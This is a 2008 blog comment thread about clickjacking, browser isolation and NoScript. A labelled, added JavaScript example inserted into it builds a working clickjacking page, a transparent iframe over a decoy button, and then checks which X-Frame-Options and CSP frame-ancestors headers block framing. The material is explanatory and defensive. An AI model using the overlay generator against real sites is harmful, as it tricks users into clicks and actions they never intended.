Comments: Clickjacking -- the new browser wipe-out

Actually, I use elinks every now and then, really ;)

Posted by BigMac at September 29, 2008 10:52 AM

After having been involved in troubleshooting a network integrity problem in the 70s related to automatic scripting ... I've always run with no scripting, no plug-ins, no cookies, no automatic application.

I've found only a few sites that figure they absolutely need it ... so I have two browser instances with different personalities open at the same time in different workspaces. The 2nd personality has the NoScript plug-in configured.

This is basically a form of the virtualization theme ... keeping things strongly isolated/partitioned. For the really paranoid there is a process that automagically creates a whole virtual machine (from scratch) for a browser session ... and then the whole thing is scrubbed/discarded.

This is also related to the theme about virtualization being used to eliminate the current traditional desktop operating systems and replace them with a virtual machine layer with multiple "virtual appliances" ... basically drastically simplified monitors for specific environments (increasing security since it eliminates a lot of the complexity that contributes to vulnerabilities).

This was somewhat the CP67 & CMS implementation from the 60s.

--
40+ yrs virtualization experience, online at home since Mar70

Posted by Lynn Wheeler at September 29, 2008 11:05 AM

I have been raring to nominate NoScript but I want more usability improvements.

1. I want some way to subscribe to a whitelist - so that the admin or someone trusted could whitelist items easily

2. I want NoScript to allow trivial JS, like allowing JS to resize CSS boxes etc., and disallow ALL that is even a little advanced. I don't know whether this is even possible in JScript.

And in general make it less cryptic for mom and pop.

Posted by anonymous at September 29, 2008 02:47 PM

Whilst "install NoScript" sounds like a great idea short term, what happens when attention is given to NoScript and - like most products given sufficient attention - NoScript is found wanting? We need to bear in mind that people don't take kindly to "do this" and then a month later being told to stop doing just what they've been told and change once again.

I subscribe to Lynn's view of thinking. I, too, have two different browsers, Firefox and Opera: first for normal browsing, second for banking, purchases, etc.

Posted by Saso at September 30, 2008 12:17 AM

Since the exploit is said not to require JavaScript, it may well be based on CSS (say, hiding a malicious link or form under something innocuous and relying on the event cascade to deliver clicks to it). If the exploit truly doesn't need JavaScript then NoScript will only protect you to the extent that it inconveniences the bad guy a little.

Posted by Mark Seecof at October 1, 2008 06:41 PM
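
The CSS-only overlay that the comment above describes, as an added example that is not part of the original thread or any commenter's code. The first part builds an attacker page that lays a fully transparent iframe of the target over a decoy button, so the victim's click lands on a control in the framed page with no script running at all; the second part evaluates the two response headers (X-Frame-Options and CSP frame-ancestors, both adopted by browsers after this 2008 discussion) that decide whether a target can be framed that way. The origins, header values, and the names buildClickjackPage, framingAllowed, matchesSource, SAMPLE_HEADERS and frameableBy are all constructed for this example.

```javascript
// Added example, not code from the original post or its commenters.
// Part 1 builds the CSS-only overlay page the comment describes; part 2
// evaluates the two response headers that stop a page from being framed.
// All URLs, origins and header values below are constructed for the demo.

// Attacker page: a visible decoy button with a fully transparent iframe of
// the target laid over it. No script runs in the victim's browser; the
// iframe is the topmost element, so the click goes straight to whatever
// control in the framed page has been positioned under the decoy.
// offsetX/offsetY are the page coordinates of that control in the target.
function buildClickjackPage(targetUrl, offsetX, offsetY) {
  const decoyTop = 100, decoyLeft = 100;
  return `<!doctype html>
<style>
  #decoy  { position:absolute; top:${decoyTop}px; left:${decoyLeft}px;
            width:120px; height:40px; }
  #victim { position:absolute; top:${decoyTop - offsetY}px; left:${decoyLeft - offsetX}px;
            width:1200px; height:900px; opacity:0; border:0; z-index:2; }
</style>
<button id="decoy">Play</button>
<iframe id="victim" src="${targetUrl}" scrolling="no"></iframe>`;
}

// Does one CSP source expression (e.g. "https:", "*.example.com",
// "https://partner.example") match the framing page's origin?
function matchesSource(src, framerOrigin) {
  if (/^[a-z][a-z0-9+.-]*:$/.test(src)) return framerOrigin.startsWith(src); // scheme-only
  const framer = new URL(framerOrigin);
  let scheme = null, host = src;
  const m = src.match(/^([a-z][a-z0-9+.-]*):\/\/(.*)$/);
  if (m) { scheme = m[1]; host = m[2]; }
  if (scheme && scheme !== framer.protocol.replace(':', '')) return false;
  if (host.startsWith('*.')) return framer.host.endsWith(host.slice(1));
  return framer.host === host;
}

// Decide whether a response carrying `headers` (plain object, lower-case
// names) may be framed by a page at `framerOrigin`. When a CSP
// frame-ancestors directive is present it takes precedence and
// X-Frame-Options is ignored, which is what current browsers do.
function framingAllowed(headers, framerOrigin, targetOrigin) {
  const csp = headers['content-security-policy'];
  if (csp) {
    const directive = csp.split(';').map(s => s.trim())
      .find(s => s.toLowerCase().startsWith('frame-ancestors'));
    if (directive) {
      const sources = directive.split(/\s+/).slice(1)
        .map(s => s.replace(/^'|'$/g, '').toLowerCase());
      if (sources.includes('none')) return false;      // an empty list also denies
      if (sources.includes('*')) return true;
      if (sources.includes('self') && framerOrigin === targetOrigin) return true;
      return sources.some(src => matchesSource(src, framerOrigin));
    }
  }
  const xfo = (headers['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return framerOrigin === targetOrigin;
  // ALLOW-FROM was IE/Firefox-only and is ignored by modern browsers; an
  // absent, empty or unrecognised header leaves the page frameable.
  return true;
}

// Constructed sample responses, as a fetch of each target might return them.
const SAMPLE_HEADERS = {
  unprotected: {},
  xfoDeny:     { 'x-frame-options': 'DENY' },
  xfoSame:     { 'x-frame-options': 'SAMEORIGIN' },
  cspNone:     { 'content-security-policy': "default-src 'self'; frame-ancestors 'none'" },
  cspPartner:  { 'content-security-policy': "frame-ancestors 'self' https://partner.example",
                 'x-frame-options': 'DENY' },  // the CSP directive wins over the XFO here
};

// Names of the sample targets that a page at `framerOrigin` could frame.
function frameableBy(framerOrigin, targetOrigin = 'https://bank.example') {
  return Object.keys(SAMPLE_HEADERS)
    .filter(name => framingAllowed(SAMPLE_HEADERS[name], framerOrigin, targetOrigin));
}

console.log(frameableBy('https://evil.example'));     // [ 'unprotected' ]
console.log(frameableBy('https://partner.example'));  // [ 'unprotected', 'cspPartner' ]
```

The point of the checker is the one the comment makes: nothing in the first function needs JavaScript, so a script blocker on the victim's side does not enter into it. What matters is whether the framed site's response headers let it be framed at all, which is a property of the target, not of the victim's browser configuration.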

The mom & pop NoScript shouldn't have an 'allow scripts Globally' function. Neither should an (the same?) enterprise version of the software. Looking at the rate of features of the NoScript plugin I'm wondering if I'll ever understand what it's really doing. I still use it though.

Posted by dan at October 7, 2008 08:16 AM